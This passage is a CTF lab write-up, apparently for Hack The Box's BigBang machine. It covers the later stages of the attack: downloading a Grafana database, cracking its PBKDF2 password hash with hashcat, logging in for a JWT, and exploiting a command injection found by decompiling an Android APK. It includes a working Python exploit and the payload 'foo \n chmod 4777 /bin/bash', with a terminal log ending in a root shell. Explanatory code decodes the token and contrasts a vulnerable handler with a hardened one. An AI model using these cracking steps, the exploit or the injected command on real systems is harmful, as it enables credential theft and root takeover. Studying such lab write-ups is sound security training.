└─# curl http://127.0.0.1:9090/login -d test
<!doctype html>
<html lang=en>
<title>415 Unsupported Media Type</title>
<h1>Unsupported Media Type</h1>
<p>Did not attempt to load JSON data because the request Content-Type was not 'application/json'.</p>
Port 3000 serves a Grafana login page.
Download the db file with scp:
sudo scp shawking@10.10.11.52:/opt/data/grafana.db ./grafana.db
Opening it, the user table holds a salt and a password column. A conversion script for cracking:
https://github.com/iamaldi/grafana2hashcat
Write the password and salt to a txt file in the following format:
7e8018a4210efbaeb12f0115580a476fe8f98a4f9bada2720e652654860c59db93577b12201c0151256375d6f883f1b8d960,4umebBJucv
Convert with the script and crack the hash:
┌──(root㉿kali)-[/home/kali/crack/grafana2hashcat]
└─# python grafana2hashcat.py hash.txt -o hash
[+] Grafana2Hashcat
[+] Reading Grafana hashes from: hash.txt
[+] Done! Read 1 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[+] Writing output to 'hash' file.
[+] Now, you can run Hashcat with the following command, for example:
hashcat -m 10900 hashcat_hashes.txt --wordlist wordlist.txt
┌──(root㉿kali)-[/home/kali/crack/grafana2hashcat]
└─# ls
grafana2hashcat.py hash hash.txt README.md
┌──(root㉿kali)-[/home/kali/crack/grafana2hashcat]
└─# hashcat -m 10900 hash --wordlist /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-14700HX, 2789/5642 MB (1024 MB allocatable), 14MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 3 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3sSIBwBUSVjddb4g/G42WA=:bigbang
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb...G42WA=
Time.Started.....: Wed Apr 2 10:48:03 2025 (1 sec)
Time.Estimated...: Wed Apr 2 10:48:04 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8912 H/s (6.85ms) @ Accel:64 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7168/14344385 (0.05%)
Rejected.........: 0/7168 (0.00%)
Restore.Point....: 6272/14344385 (0.04%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9216-9999
Candidate.Engine.: Device Generator
Candidates.#1....: bugger -> emoemo
Hardware.Mon.#1..: Util: 82%
Started: Wed Apr 2 10:47:42 2025
Stopped: Wed Apr 2 10:48:06 2025
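What grafana2hashcat converts and what hashcat then checks, as an added Python example (not code from this writeup, grafana2hashcat or hashcat): Grafana stores passwords as PBKDF2-HMAC-SHA256 with 10000 iterations and a 50-byte derived key, hex-encoded beside the salt, and hashcat mode 10900 expects sha256:<iterations>:<base64 salt>:<base64 digest>. The hash, salt and recovered password are the ones shown above; the function names are my own.

```python
import base64
import hashlib
import hmac

# Grafana's password scheme (pkg/util/encoding.go): PBKDF2-HMAC-SHA256,
# 10000 iterations, 50-byte derived key, stored hex-encoded next to the salt.
GRAFANA_ITERATIONS = 10000
GRAFANA_KEY_LEN = 50

# Values copied from the grafana.db user table shown in the writeup (hash.txt).
GRAFANA_HASH_HEX = (
    "7e8018a4210efbaeb12f0115580a476fe8f98a4f9bada2720e652654860c59db"
    "93577b12201c0151256375d6f883f1b8d960"
)
GRAFANA_SALT = "4umebBJucv"


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def grafana_to_hashcat(hash_hex: str, salt: str,
                       iterations: int = GRAFANA_ITERATIONS) -> str:
    """Rewrite a Grafana (hex digest, salt) pair in hashcat mode 10900 syntax:
    sha256:<iterations>:<base64 salt>:<base64 digest>. This is the same
    transformation grafana2hashcat.py performs on each line of hash.txt."""
    digest = bytes.fromhex(hash_hex)
    if len(digest) != GRAFANA_KEY_LEN:
        raise ValueError(f"expected a {GRAFANA_KEY_LEN}-byte digest, got {len(digest)}")
    return f"sha256:{iterations}:{_b64(salt.encode('ascii'))}:{_b64(digest)}"


def verify_grafana_password(candidate: str, hash_hex: str, salt: str,
                            iterations: int = GRAFANA_ITERATIONS) -> bool:
    """Re-derive the key for one candidate password and compare it in
    constant time against the stored digest. This is exactly the work
    hashcat repeats for every wordlist entry, which is why 10000 PBKDF2
    rounds keep its rate in the kH/s range rather than GH/s."""
    derived = hashlib.pbkdf2_hmac(
        "sha256",
        candidate.encode("utf-8"),
        salt.encode("utf-8"),
        iterations,
        dklen=GRAFANA_KEY_LEN,
    )
    return hmac.compare_digest(derived, bytes.fromhex(hash_hex))


if __name__ == "__main__":
    print(grafana_to_hashcat(GRAFANA_HASH_HEX, GRAFANA_SALT))
    for guess in ("quantumphysics", "bigbang"):
        print(guess, verify_grafana_password(guess, GRAFANA_HASH_HEX, GRAFANA_SALT))
```

The key-stretching explains the 8912 H/s above; the hash still fell in a second only because the password sits within the first few thousand entries of rockyou.txt (Progress: 7168/14344385).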
With the password recovered, build the JSON body and POST it to port 9090:
┌──(root㉿kali)-[/home/kali/crack/grafana2hashcat]
└─# curl -X POST -v 127.0.0.1:9090/login \
-H "Content-Type: application/json" \
-d '{"username":"developer","password":"bigbang"}'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 127.0.0.1:9090...
* Connected to 127.0.0.1 (127.0.0.1) port 9090
* using HTTP/1.x
> POST /login HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/json
> Content-Length: 45
>
* upload completely sent off: 45 bytes
< HTTP/1.1 200 OK
< Server: Werkzeug/3.0.3 Python/3.10.12
< Date: Wed, 02 Apr 2025 14:37:48 GMT
< Content-Type: application/json
< Content-Length: 356
< Connection: close
<
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0MzYwNDY2OCwianRpIjoiNzFmYmJlNzYtZTZjOS00N2RiLTg5OTItZmEzYTlmMmQxMGE2IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTc0MzYwNDY2OCwiY3NyZiI6ImE0NDc1NDgwLTY0NzMtNDQyZS05ODBmLTUzYjZmYzA0NDgyMSIsImV4cCI6MTc0MzYwODI2OH0.OLa3FXWSf9Ood1N54xaFkCg-IE4b89VgFjC5PpinZkw"}
* shutting down connection #0
The returned access_token is a JWT. Substituting it into requests to the service on port 3000 got nowhere, which is expected: it is HS256-signed by the application on 9090 with that application's own secret, so unless the two services share the signing key another service has no reason to accept it.
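The first thing to do with a token like this is to read it, without trusting it. The following is an added example, not code from the original write-up; its only input is the access_token returned by the /login call above. It base64url-decodes the header and claims, reports the algorithm, subject and lifetime, and leaves the signature unverified (the HS256 secret lives on the 9090 server, so nothing here can check it). The claim layout (fresh, type, jti, csrf next to the standard sub/iat/nbf/exp) is the one flask-jwt-extended issues, which fits the Werkzeug/Python server header in the response.

```python
import base64
import json
import time

# Token returned by POST /login above, split at the two dots.
ACCESS_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9"
    "."
    "eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0MzYwNDY2OCwianRpIjoiNzFmYmJlNzYtZTZjOS00N2RiLTg5OTItZmEzYTlmMmQxMGE2Iiwi"
    "dHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTc0MzYwNDY2OCwiY3NyZiI6ImE0NDc1NDgwLTY0NzMtNDQyZS05ODBmLTUzYjZmYzA0NDgyMSIsImV4cCI6MTc0MzYwODI2OH0"
    "."
    "OLa3FXWSf9Ood1N54xaFkCg-IE4b89VgFjC5PpinZkw"
)


def b64url_decode(segment):
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token):
    """Return (header, claims, signature bytes) WITHOUT checking the signature.

    Good for inspection only: never base an authorization decision on this."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(claims_b64))
    return header, claims, b64url_decode(sig_b64)


def summarize(token, now=None):
    """The facts an operator wants at a glance: algorithm, subject, token type,
    lifetime, whether it is currently valid, and the signature size (32 bytes
    for HS256)."""
    header, claims, sig = decode_jwt_unverified(token)
    now = time.time() if now is None else now
    return {
        "alg": header.get("alg"),
        "sub": claims.get("sub"),
        "type": claims.get("type"),
        "fresh": claims.get("fresh"),
        "lifetime_s": claims["exp"] - claims["iat"],
        "expired": now >= claims["exp"],
        "not_yet_valid": now < claims.get("nbf", 0),
        "sig_len": len(sig),
    }


if __name__ == "__main__":
    header, claims, _ = decode_jwt_unverified(ACCESS_TOKEN)
    print("header:", header)
    print("claims:", json.dumps(claims, indent=2))
    print("summary:", summarize(ACCESS_TOKEN))
```

Run against the token above it reports sub=developer, type=access and a one-hour lifetime (exp - iat = 3600), so a fresh login is needed once it lapses.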
Privilege escalation via the developer user: reversing the APK reveals a command injection
After switching to the developer user there is an android directory containing satellite-app.apk.
Pulling it down and decompiling it gives the following code, which points at the vulnerability:
package q0;

import android.os.AsyncTask;
import android.os.Environment;
import android.widget.Toast;
import com.satellite.bigbang.TakePictureActivity;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;

/* loaded from: classes.dex */
public final class b extends AsyncTask {
    /* renamed from: a, reason: collision with root package name */
    public String f3686a;   // the user-supplied output file name
    /* renamed from: b, reason: collision with root package name */
    public final /* synthetic */ TakePictureActivity f3687b;

    public b(TakePictureActivity takePictureActivity) {
        this.f3687b = takePictureActivity;
    }

    @Override // android.os.AsyncTask
    public final Object doInBackground(Object[] objArr) {
        this.f3686a = ((String[]) objArr)[0];
        try {
            // Backend endpoint, reached with the bearer token the activity holds in f2003p
            HttpURLConnection httpURLConnection = (HttpURLConnection) new URL("http://app.bigbang.htb:9090/command").openConnection();
            httpURLConnection.setRequestMethod("POST");
            httpURLConnection.setRequestProperty("Content-Type", "application/json");
            httpURLConnection.setRequestProperty("Authorization", "Bearer " + this.f3687b.f2003p);
            httpURLConnection.setDoOutput(true);
            // output_file is concatenated into the JSON body with no validation
            String str = "{\"command\": \"send_image\", \"output_file\": \"" + this.f3686a + "\"}";
            OutputStream outputStream = httpURLConnection.getOutputStream();
            try {
                byte[] bytes = str.getBytes("utf-8");
                outputStream.write(bytes, 0, bytes.length);
                outputStream.close();
                if (httpURLConnection.getResponseCode() != 200) {
                    return Boolean.FALSE;
                }
                // On success the response body is written to Pictures/<output_file>
                InputStream inputStream = httpURLConnection.getInputStream();
                FileOutputStream fileOutputStream = new FileOutputStream(new File(Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_PICTURES), this.f3686a));
                try {
                    byte[] bArr = new byte[1024];
                    while (true) {
                        int read = inputStream.read(bArr);
                        if (read == -1) {
                            fileOutputStream.close();
                            inputStream.close();
                            return Boolean.TRUE;
                        }
                        fileOutputStream.write(bArr, 0, read);
                    }
                } finally {
                }
            } finally {
            }
        } catch (Exception e2) {
            e2.printStackTrace();
            return Boolean.FALSE;
        }
    }

    @Override // android.os.AsyncTask
    public final void onPostExecute(Object obj) {
        boolean booleanValue = ((Boolean) obj).booleanValue();
        TakePictureActivity takePictureActivity = this.f3687b;
        if (booleanValue) {
            Toast.makeText(takePictureActivity, "Request Successful and Image Downloaded", 0).show();
        } else {
            Toast.makeText(takePictureActivity, "Request Failed", 0).show();
        }
    }
}
The command injection sits in the backend this code talks to, not in the app itself: the app builds the JSON body by string concatenation and hands the user-supplied output_file to /command without any validation, so whatever the server does with that field it does with attacker-controlled text.
Analysis of the vulnerable code:
Vulnerable code:
String str = "{\"command\": \"send_image\", \"output_file\": \"" + this.f3686a + "\"}";
Here output_file comes straight from user input (this.f3686a) with no filtering or validation. If the server does not handle the field safely, an attacker can craft a malicious output_file to inject a command, for example:
{"command": "send_image", "output_file": "foo \n chmod 4777 /bin/bash"}
If the server passes output_file to a shell, the \n newline terminates the intended command and everything after it (here chmod 4777 /bin/bash) runs as a separate command. Because the backend runs as root, that leaves a setuid-root bash on the box, which is enough to take it over.
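The backend's handler is not on the page, so the following is an added, hypothetical stand-in (not the box's code, and not from the original write-up) that reproduces the behaviour observed later: the name is pasted into a shell line, a newline therefore starts a second command, and the read that follows fails with ENOENT on the literal string, i.e. the side effect happens even though the client sees a 500. The hardened version beside it treats output_file as data: an allow-list check, confinement to the working directory, and an argument vector with no shell. The demo injects a harmless `touch` of the same shape as the write-up's payload instead of the chmod.

```python
import os
import re
import subprocess
import tempfile

# Allow-list for a bare file name: no separators, no whitespace, no leading dot.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def is_safe_output_file(name):
    return bool(SAFE_NAME.fullmatch(name))


def vulnerable_send_image(output_file, workdir):
    """Hypothetical stand-in for the backend: the caller-controlled name is
    interpolated into a shell command line. A newline inside it ends the
    first command and the remainder runs as a second one."""
    subprocess.run(f"echo image-data > {output_file}", shell=True, cwd=workdir)
    try:
        with open(os.path.join(workdir, output_file), "rb") as fh:
            return 200, fh.read()
    except OSError as exc:
        # The 500 in the write-up comes from this point: the shell has already run.
        return 500, f"Error reading image file: {exc}"


def hardened_send_image(output_file, workdir):
    """Same job with output_file treated as data: validated against the
    allow-list, confined to workdir, and passed to the child as one argv
    element with no shell in between."""
    if not is_safe_output_file(output_file):
        raise ValueError("invalid output_file")
    root = os.path.realpath(workdir)
    target = os.path.realpath(os.path.join(root, output_file))
    if os.path.dirname(target) != root:
        raise ValueError("output_file escapes the working directory")
    with open(target, "wb") as fh:
        subprocess.run(["echo", "image-data"], stdout=fh, check=True)
    with open(target, "rb") as fh:
        return 200, fh.read()


def demo():
    """Run both handlers on a benign injection of the write-up's payload shape."""
    payload = "foo \n touch injected.txt"  # constructed: newline, then a second command
    results = {}
    with tempfile.TemporaryDirectory() as vuln_dir, tempfile.TemporaryDirectory() as safe_dir:
        status, _body = vulnerable_send_image(payload, vuln_dir)
        results["vuln_status"] = status
        results["vuln_injected_ran"] = os.path.exists(os.path.join(vuln_dir, "injected.txt"))
        try:
            hardened_send_image(payload, safe_dir)
            results["hardened_rejected"] = False
        except ValueError:
            results["hardened_rejected"] = True
        results["hardened_injected_ran"] = os.path.exists(os.path.join(safe_dir, "injected.txt"))
        results["hardened_ok"] = hardened_send_image("photo.jpg", safe_dir) == (200, b"image-data\n")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable path returns 500 with the same "No such file or directory" text the box produced, yet `injected.txt` exists afterwards; the hardened path rejects the payload before anything runs and still serves a well-formed name.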
import requests

# Paste the access_token returned by POST /login (the JWT above) here.
TOKEN = "TOKEN"

url = "http://127.0.0.1:9090/command"
headers = {
    # Mirrors the curl request; only Content-Type and Authorization matter to the server.
    "Host": "127.0.0.1:9090",
    "User-Agent": "curl/8.10.1",
    "Accept": "*/*",
    "Content-Type": "application/json",
    "Authorization": f"Bearer {TOKEN}",
}
# Same body shape the app builds. The newline ends the server's command line so that
# chmod runs as a second command; the backend runs as root, so /bin/bash becomes setuid root.
payload = {
    "command": "send_image",
    "output_file": "foo \n chmod 4777 /bin/bash",
}

response = requests.post(url, headers=headers, json=payload)
print("Status Code:", response.status_code)
print("Response Body:", response.text)
Replace TOKEN with the JWT and run the script. The 500 does not mean the injection failed: the server only errors when it tries to read an image file named by the whole string, by which point the shell has already run the chmod, as the following bash -p shows:
developer@bigbang:~/android$ vim exploit.py
developer@bigbang:~/android$ python3 exploit.py
Status Code: 500
Response Body: {"error":"Error reading image file: [Errno 2] No such file or directory: 'foo \\n chmod 4777 /bin/bash'"}
developer@bigbang:~/android$ ls
exploit.py exp.py satellite-app.apk
developer@bigbang:~/android$ bash -p
bash-5.1# whoami
root
bash-5.1# ls
exploit.py exp.py satellite-app.apk
bash-5.1# cd /root
bash-5.1# ls
resolv.conf root.txt satellite snap
bash-5.1# cat root.txt
xxxxxxxxxxxxx
bash-5.1#
Summary:
Recon showed the site runs WordPress; wpscan found a CVE that gave a www-data shell. The default WordPress database config file gave MySQL access and the shawking user's password. The services on 9090 and 3000 together with the grafana.db database file gave the developer user. Reversing the Android app revealed a command injection in the backend, which escalated to root.
Great write-up, though the output could be trimmed a bit.